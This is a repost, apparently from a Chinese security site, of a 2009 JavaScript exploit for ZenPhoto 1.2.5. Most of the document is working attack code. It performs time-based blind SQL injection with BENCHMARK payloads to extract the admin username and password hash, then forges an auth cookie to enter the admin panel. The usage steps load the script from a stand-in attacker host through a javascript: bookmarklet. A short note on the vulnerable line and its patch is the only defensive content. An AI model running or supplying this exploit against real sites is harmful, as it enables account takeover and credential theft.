首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit
来源:petros@dusecurity.com 作者:petros 发布时间:2009-07-16  

/*
 * ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit
 * Requirements: magic_quotes = ANY (zenpage disables it anyway), ZenPage needs to be activated and have at least one news category
 *
 * What does this exploit let you do:
 * The precoded functions I provided will allow you to extract the username and password hash of the admin from the database.
 * It will also let you login to the admin panel w/o actually knowing the plain text password (only the username and hash are required)
 *
 * How To Use:
 * 1) upload this script to http://attacker/exploit.js
 * 2) open a vulnerable category in your webbrowser (Example: http://victim/zenphoto/news/category/anycategorynamehere)
 * 3) Enter the following code into your address bar:
 * javascript:(function(){var url = "http://attacker/exploit.js"; var evil = document.createElement('script'); evil.src = url; document.body.appendChild(evil);})();
 * 4) Press enter and wait for the exploit console to show
 * 5) You may now extract the username/password hash from the database (buggy  :(  )
 * 6) Use the username/password hash with the Login Emulation tool to login to the admin panel
 * 7) Have fun  :)
 *
 * WARNING: THIS IS BUGGY! You might not get the hash/username correct the first time. Play with the settings below to tweak it so it works better for you
 *
 * Why this works:
 * The sanitize function doesn't escape single quotes...
 *
 * Vulnerable Code (index.php):
 * 95: $catname = sanitize($_GET['category']);
 * 96: query("UPDATE ".prefix('zenpage_news_categories')." SET `hitcounter` = `hitcounter`+1 WHERE `cat_link` = '".$catname."'",true);
 *
 * Patch:
 * 95: $catname = mysql_real_escape_string($_GET['category']);
 *
 * Example Exploitation:
 * /zenphoto/news/category/cat1' and hitcounter = (SELECT IF(SUBSTRING(password,1 ,1) = 'A',BENCHMARK(5000000,ENCODE('this will probably','waste some time')),null) FROM zp_administrators) and '1' = '1
 *
 * This payload will delay the page from loading for about 5 seconds if the first letter of the password hash is 'A'
 *
 * The time detection isn't perfect and was pretty much slapped together. Make sure you try editing the variables below or
 * make your own injector :P
 *
 * Discovered and Coded by petros@dusecurity.com
 * Shoutz to xplorer and the rest of the DuSec Team
 */


// Change this if you are having problems with the injection
var patience = .8; // Time in seconds on how patient we are. Will be substracted from the benchmark time
var max_retries = 3; // maximum retries after failed HTTP request
var charset_hash = "0123456789abcdef".split(''); // charset for the password hash
var charset_username = "abcdefghiklmnopqrstuvqxzy0123456789ABCEDFGHIJKLMNOPQRSTUVWXYZ ._".split(''); // charset for the username
var username_max = 64; // max length of the username
var hash_max = 32; // max length of password hash (its md5..i wouldnt change this)
var benchmark_code = "BENCHMARK(5850000,ENCODE('this will probably','waste some time'))"; // code used to slow down requests if the query is true
var show_timing = false; // whether or not to show the timings of each request (good for debugging)
var delay = 1500; // delay in miliseconds between request
var err_delay = 1000; //delay in miliseconds to wait after an error


// Dont edit below this line
var display = false;
var display_loot = false;
var loot = false;
var loot_username = false;
var loot_password = false;

function get(page) // returns how long it took to send/receive the request...
{
 var xhr = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
 
 xhr.open('GET', page, false); // keep it syncronized..
  xhr.setRequestHeader( "If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT" ); // cache..
 var seconds = getTime();
 xhr.send(null);
 seconds = getTime() - seconds;
 var success = (xhr.readyState == 4 && xhr.status == 200);
 xhr = null; // dispose
 return { 'miliseconds': seconds, 'seconds': seconds / 1000, 'success': success };
 
}
function getTime()
{
 return Math.round(new Date().getTime());
}
function createDisplay() // create the display div
{
 var div = document.createElement("DIV");
 div.style.backgroundColor = '#C3FFB9';
 div.style.border = '2px dashed green';
 div.style.margin = '3px';
 div.style.paddingLeft = '10px';
 div.style.paddingBottom = '10px';
 
 div.innerHTML = '<h2>ZenPhoto Blind Injection -- petros@dusecurity</h2><p><br /></p>';
 display = document.createElement("P");
 
 document.body.insertBefore(div, document.body.childNodes[0]);
 div.appendChild(display);
}

function write(text)
{
 display.innerHTML += text + "<br />";
}

function setDisplay(text)
{
 display.innerHTML = text;
}

function clearDisplay()
{
 display.innerHTML = '';
}
function getPath()
{
 return window.location.pathname;
}

function showMenu()
{
 clearDisplay();
 write('What you like to do?');
 var ul = document.createElement('OL'); // changed to OL so they know to do it in steps
 createListItem('Extract Admin Username', 'extractusername();',ul);
 createListItem('Extract Admin Password','extractpassword();',ul);
 createListItem('Login to Admin using Hash', 'adminlogin();', ul);
 display.appendChild(ul);
}
var un;
var pw;
function adminlogin()
{
 clearDisplay();
 write("Admin Login Emulator: ");
 un = createTextbox('Username: ', (loot_username) ? loot_username : '[Enter Username]');
 pw = createTextbox('Password: ', (loot_password) ? loot_password: '[Enter Hash]');
 createButton('Pwn!', "step2();");
 write('<br /><a href="javascript:showMenu();">Back To Menu</a>');

}
function step2()
{
  var username = un.value;
  var password = pw.value;
  var auth =MD5(username + password);
  SetCookie('zenphoto_auth', MD5(username + password), 30);
  clearDisplay();
  write("Generated auth cookie: zenphoto_auth=" + auth);
  write("You are now logged in with admin privileges :)");
  write('<a href="../../zp-core/admin.php">Enter Admin Panel</a>');
  write('<br /><a href="javascript:showMenu();">Back To Menu</a>');

}
function createTextbox(label, value)
{
 display.innerHTML += "<strong>" + label + "</strong>";
 var tb = document.createElement('input');
 tb.type = 'text';
 tb.value = value;
 display.appendChild(tb);
 write('');
 return tb;
 
}
function createButton(text, click)
{
 write("<BUTTON onclick=\"" + click + "\">" + text + "</BUTTON>");
 
}
function addEvent(elem, type, handle)
{
 if (elem.addEventListener)
   elem.addEventListener(type, handle, false);
 else if (elem.attachEvent)
   elem.attachEvent("on" + type, handle);
}
// borrowed function
function SetCookie(cookieName,cookieValue,nDays) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
                 + ";expires="+expire.toGMTString() + ";path=../../";
}

function extractusername()
{
 clearDisplay();
 var path = getPath();
 var basetime = 0;
 var benchmark = 0;
 var diff = 0;
 var offset = 0;
 var charset_len = charset_username.length;
 var resp = false;
 loot = '';
 display_loot = false;
 write("Extracting username..");
 write("Using path: " + path);
 
 resp = get(path);
 if(!resp.success) { write("Failed to request page."); return; }
 basetime = resp.miliseconds;
 write("Normal request time set to " + basetime + " milisecond(s)");
 resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
 benchmark = resp.miliseconds;
 diff = benchmark - basetime;
 if(diff <= (patience * 1000)){ alert("Error calculating request difference! Try again later."); showMenu();}
 write("Benchmark request time set to " + benchmark + " milisecond(s)");
 if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
 write("Username: <div id=\"loot\"></div>");
 display_loot = document.getElementById('loot');
 var retries = 0;
 var min = diff - (patience * 1000);
 var best_match = 0;
 var best = '';
 if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
 function readNextChar()
 {
  var c = charset_username[offset];
  display_loot.innerHTML = '';
  display_loot.innerHTML += loot + c;
  
  resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(user,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
  if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
  retries = 0; //reset error counter
  var took = resp.miliseconds - basetime; //difference
 
  if(took > 0 && best_match < took) {best_match = took; best = c;}
  if(show_timing)
   write(loot.length + 1 + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
  if(took >=  min)
  {
   loot += c;
   if(show_timing)
   write("got \"" + loot + "\" so far...");
   display_loot.innerHTML = '';
   display_loot.innerHTML += loot;
   best = '';
   best_match = 0;
   offset = 0;
  }
  else
   offset++;
   
  if(loot.length >= username_max)
  {
   display_loot.innerHTML = ''; display_loot += loot;
   loot_username = loot;
   write('<a href="javascript:showMenu();">Back To Menu</a>');
   alert("Admin Username is \"" + loot + "\"\r\n(reached max length)");
   return;
  }
  if(offset < charset_len)
   setTimeout(readNextChar, delay);
  else
  {
   if(loot.length < username_max)
   {
    write("best match: " + best_match);
    function beAnAsshole(){
    loot +=  best;
    best = ''; best_match = 0;
    display_loot.innerHTML = '';
    display_loot.innerHTML += loot;
    offset = 0;
    setTimeout(readNextChar, delay);
    return;}
   }
   display_loot.innerHTML = '';
   display_loot.innerHTML += loot;
   loot_username = loot;
   write('<a href="javascript:showMenu();">Back To Menu</a>');
   
   alert("Admin Username is \"" + loot + "\"");
  }
 }
  readNextChar();
 }

function extractpassword()
{
 clearDisplay();
 var path = getPath();
 var basetime = 0;
 var benchmark = 0;
 var diff = 0;
 var offset = 0;
 var charset_len = charset_hash.length;
 var resp = false;
 loot = '';
 display_loot = false;
 write("Extracting password..");
 write("Using path: " + path);
 
 resp = get(path);
 if(!resp.success) { write("Failed to request page."); return; }
 basetime = resp.miliseconds;
 write("Normal request time set to " + basetime + " milisecond(s)");
 resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1");
 benchmark = resp.miliseconds;
 write("Benchmark request time set to " + benchmark + " milisecond(s)");
 if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;}
 write("Password: <div id=\"loot\"></div>");
 display_loot = document.getElementById('loot');
 var retries = 0;
 diff = benchmark - basetime;
 if(diff <= 0) { alert("Failed to determine difference. Try again later"); showMenu(); return;}
 var min = diff- (patience * 1000);
 var best_match = 0;
 var best = '';
 if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;}
 function readNextChar()
 {
  var c = charset_hash[offset];
  display_loot.innerHTML = '';
  display_loot.innerHTML += loot + c;
  
  resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(password,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1");
  if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;}
  var took = resp.miliseconds - basetime;
  retries = 0;
  if(took > 0 && took > best_match) {best_match = took; best = c;}
  if(show_timing)
   write(loot.length + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min);
  if(took >=  min)
  {
   loot += c;
   display_loot.innerHTML = '';
   display_loot.innerHTML += loot;
   offset = 0;
   best = ''; best_match = 0;
  }
  else
   offset++;
  if(loot.length >= hash_max)
  {
   display_loot.innerHTML = ''; display_loot += loot;
   loot_password = loot;
   write('<a href="javascript:showMenu();">Back To Menu</a>');
   alert("Admin Password Hash is \"" + loot + "\"\r\n(reached max length)");
   return;
  }
  if(offset < charset_len)
   setTimeout(readNextChar, delay);
  else
  {
   if(loot.length < hash_max)
   {
    loot +=  best;
    best = ''; best_match = 0;
    display_loot.innerHTML = '';
    display_loot.innerHTML += loot;
    offset = 0;
    setTimeout(readNextChar, delay);
    return;
   }
   display_loot.innerHTML = '';
   display_loot.innerHTML += loot;
   loot_password = loot;
   write('<a href="javascript:showMenu();">Back To Menu</a>');
   alert("Admin Password Hash is \"" + loot + "\"");
  }
 }
  readNextChar();
 }


function createListItem(label, onclick, list)
{
 var li = document.createElement("LI");
 li.innerHTML = '<a href="javascript:' + onclick + '">' + label + "</a>";
 list.appendChild(li);

}

createDisplay();
showMenu();


/**
*
*  MD5 (Message-Digest Algorithm)
http://www.webtoolkit.info/
*
**/
 
var MD5 = function (string) {
 
 function RotateLeft(lValue, iShiftBits) {
  return (lValue<<iShiftBits) | (lValue>>>(32-iShiftBits));
 }
 
 function AddUnsigned(lX,lY) {
  var lX4,lY4,lX8,lY8,lResult;
  lX8 = (lX & 0x80000000);
  lY8 = (lY & 0x80000000);
  lX4 = (lX & 0x40000000);
  lY4 = (lY & 0x40000000);
  lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF);
  if (lX4 & lY4) {
   return (lResult ^ 0x80000000 ^ lX8 ^ lY8);
  }
  if (lX4 | lY4) {
   if (lResult & 0x40000000) {
    return (lResult ^ 0xC0000000 ^ lX8 ^ lY8);
   } else {
    return (lResult ^ 0x40000000 ^ lX8 ^ lY8);
   }
  } else {
   return (lResult ^ lX8 ^ lY8);
  }
  }
 
  function F(x,y,z) { return (x & y) | ((~x) & z); }
  function G(x,y,z) { return (x & z) | (y & (~z)); }
  function H(x,y,z) { return (x ^ y ^ z); }
 function I(x,y,z) { return (y ^ (x | (~z))); }
 
 function FF(a,b,c,d,x,s,ac) {
  a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac));
  return AddUnsigned(RotateLeft(a, s), b);
 };
 
 function GG(a,b,c,d,x,s,ac) {
  a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac));
  return AddUnsigned(RotateLeft(a, s), b);
 };
 
 function HH(a,b,c,d,x,s,ac) {
  a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac));
  return AddUnsigned(RotateLeft(a, s), b);
 };
 
 function II(a,b,c,d,x,s,ac) {
  a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac));
  return AddUnsigned(RotateLeft(a, s), b);
 };
 
 function ConvertToWordArray(string) {
  var lWordCount;
  var lMessageLength = string.length;
  var lNumberOfWords_temp1=lMessageLength + 8;
  var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64;
  var lNumberOfWords = (lNumberOfWords_temp2+1)*16;
  var lWordArray=Array(lNumberOfWords-1);
  var lBytePosition = 0;
  var lByteCount = 0;
  while ( lByteCount < lMessageLength ) {
   lWordCount = (lByteCount-(lByteCount % 4))/4;
   lBytePosition = (lByteCount % 4)*8;
   lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<<lBytePosition));
   lByteCount++;
  }
  lWordCount = (lByteCount-(lByteCount % 4))/4;
  lBytePosition = (lByteCount % 4)*8;
  lWordArray[lWordCount] = lWordArray[lWordCount] | (0x80<<lBytePosition);
  lWordArray[lNumberOfWords-2] = lMessageLength<<3;
  lWordArray[lNumberOfWords-1] = lMessageLength>>>29;
  return lWordArray;
 };
 
 function WordToHex(lValue) {
  var WordToHexValue="",WordToHexValue_temp="",lByte,lCount;
  for (lCount = 0;lCount<=3;lCount++) {
   lByte = (lValue>>>(lCount*8)) & 255;
   WordToHexValue_temp = "0" + lByte.toString(16);
   WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2);
  }
  return WordToHexValue;
 };
 
 function Utf8Encode(string) {
  string = string.replace(/\r\n/g,"\n");
  var utftext = "";
 
  for (var n = 0; n < string.length; n++) {
 
   var c = string.charCodeAt(n);
 
   if (c < 128) {
    utftext += String.fromCharCode(c);
   }
   else if((c > 127) && (c < 2048)) {
    utftext += String.fromCharCode((c >> 6) | 192);
    utftext += String.fromCharCode((c & 63) | 128);
   }
   else {
    utftext += String.fromCharCode((c >> 12) | 224);
    utftext += String.fromCharCode(((c >> 6) & 63) | 128);
    utftext += String.fromCharCode((c & 63) | 128);
   }
 
  }
 
  return utftext;
 };
 
 var x=Array();
 var k,AA,BB,CC,DD,a,b,c,d;
 var S11=7, S12=12, S13=17, S14=22;
 var S21=5, S22=9 , S23=14, S24=20;
 var S31=4, S32=11, S33=16, S34=23;
 var S41=6, S42=10, S43=15, S44=21;
 
 string = Utf8Encode(string);
 
 x = ConvertToWordArray(string);
 
 a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;
 
 for (k=0;k<x.length;k+=16) {
  AA=a; BB=b; CC=c; DD=d;
  a=FF(a,b,c,d,x[k+0], S11,0xD76AA478);
  d=FF(d,a,b,c,x[k+1], S12,0xE8C7B756);
  c=FF(c,d,a,b,x[k+2], S13,0x242070DB);
  b=FF(b,c,d,a,x[k+3], S14,0xC1BDCEEE);
  a=FF(a,b,c,d,x[k+4], S11,0xF57C0FAF);
  d=FF(d,a,b,c,x[k+5], S12,0x4787C62A);
  c=FF(c,d,a,b,x[k+6], S13,0xA8304613);
  b=FF(b,c,d,a,x[k+7], S14,0xFD469501);
  a=FF(a,b,c,d,x[k+8], S11,0x698098D8);
  d=FF(d,a,b,c,x[k+9], S12,0x8B44F7AF);
  c=FF(c,d,a,b,x[k+10],S13,0xFFFF5BB1);
  b=FF(b,c,d,a,x[k+11],S14,0x895CD7BE);
  a=FF(a,b,c,d,x[k+12],S11,0x6B901122);
  d=FF(d,a,b,c,x[k+13],S12,0xFD987193);
  c=FF(c,d,a,b,x[k+14],S13,0xA679438E);
  b=FF(b,c,d,a,x[k+15],S14,0x49B40821);
  a=GG(a,b,c,d,x[k+1], S21,0xF61E2562);
  d=GG(d,a,b,c,x[k+6], S22,0xC040B340);
  c=GG(c,d,a,b,x[k+11],S23,0x265E5A51);
  b=GG(b,c,d,a,x[k+0], S24,0xE9B6C7AA);
  a=GG(a,b,c,d,x[k+5], S21,0xD62F105D);
  d=GG(d,a,b,c,x[k+10],S22,0x2441453);
  c=GG(c,d,a,b,x[k+15],S23,0xD8A1E681);
  b=GG(b,c,d,a,x[k+4], S24,0xE7D3FBC8);
  a=GG(a,b,c,d,x[k+9], S21,0x21E1CDE6);
  d=GG(d,a,b,c,x[k+14],S22,0xC33707D6);
  c=GG(c,d,a,b,x[k+3], S23,0xF4D50D87);
  b=GG(b,c,d,a,x[k+8], S24,0x455A14ED);
  a=GG(a,b,c,d,x[k+13],S21,0xA9E3E905);
  d=GG(d,a,b,c,x[k+2], S22,0xFCEFA3F8);
  c=GG(c,d,a,b,x[k+7], S23,0x676F02D9);
  b=GG(b,c,d,a,x[k+12],S24,0x8D2A4C8A);
  a=HH(a,b,c,d,x[k+5], S31,0xFFFA3942);
  d=HH(d,a,b,c,x[k+8], S32,0x8771F681);
  c=HH(c,d,a,b,x[k+11],S33,0x6D9D6122);
  b=HH(b,c,d,a,x[k+14],S34,0xFDE5380C);
  a=HH(a,b,c,d,x[k+1], S31,0xA4BEEA44);
  d=HH(d,a,b,c,x[k+4], S32,0x4BDECFA9);
  c=HH(c,d,a,b,x[k+7], S33,0xF6BB4B60);
  b=HH(b,c,d,a,x[k+10],S34,0xBEBFBC70);
  a=HH(a,b,c,d,x[k+13],S31,0x289B7EC6);
  d=HH(d,a,b,c,x[k+0], S32,0xEAA127FA);
  c=HH(c,d,a,b,x[k+3], S33,0xD4EF3085);
  b=HH(b,c,d,a,x[k+6], S34,0x4881D05);
  a=HH(a,b,c,d,x[k+9], S31,0xD9D4D039);
  d=HH(d,a,b,c,x[k+12],S32,0xE6DB99E5);
  c=HH(c,d,a,b,x[k+15],S33,0x1FA27CF8);
  b=HH(b,c,d,a,x[k+2], S34,0xC4AC5665);
  a=II(a,b,c,d,x[k+0], S41,0xF4292244);
  d=II(d,a,b,c,x[k+7], S42,0x432AFF97);
  c=II(c,d,a,b,x[k+14],S43,0xAB9423A7);
  b=II(b,c,d,a,x[k+5], S44,0xFC93A039);
  a=II(a,b,c,d,x[k+12],S41,0x655B59C3);
  d=II(d,a,b,c,x[k+3], S42,0x8F0CCC92);
  c=II(c,d,a,b,x[k+10],S43,0xFFEFF47D);
  b=II(b,c,d,a,x[k+1], S44,0x85845DD1);
  a=II(a,b,c,d,x[k+8], S41,0x6FA87E4F);
  d=II(d,a,b,c,x[k+15],S42,0xFE2CE6E0);
  c=II(c,d,a,b,x[k+6], S43,0xA3014314);
  b=II(b,c,d,a,x[k+13],S44,0x4E0811A1);
  a=II(a,b,c,d,x[k+4], S41,0xF7537E82);
  d=II(d,a,b,c,x[k+11],S42,0xBD3AF235);
  c=II(c,d,a,b,x[k+2], S43,0x2AD7D2BB);
  b=II(b,c,d,a,x[k+9], S44,0xEB86D391);
  a=AddUnsigned(a,AA);
  b=AddUnsigned(b,BB);
  c=AddUnsigned(c,CC);
  d=AddUnsigned(d,DD);
 }
 
 var temp = WordToHex(a)+WordToHex(b)+WordToHex(c)+WordToHex(d);
 
 return temp.toLowerCase();
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AudioPLUS 2.00.215 (.m3u .lst)
·Greenwood Content Manager 0.3.
·Icarus 2.0 (.ICP File) Local B
·Hamster Audio Player 0.3a Loca
·Mozilla Firefox 3.5 unicode Re
·Infinity <= 2.0.5 Arbitrary Cr
·Multiple Web Browsers Denial o
·Admin News Tools Remote Conten
·serv-u 7 local exp 本地溢出提
·Live For Speed 2 Version Z (.m
·MixVibes Pro 7.043 (.vib File)
·Microsoft Office Web Component
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved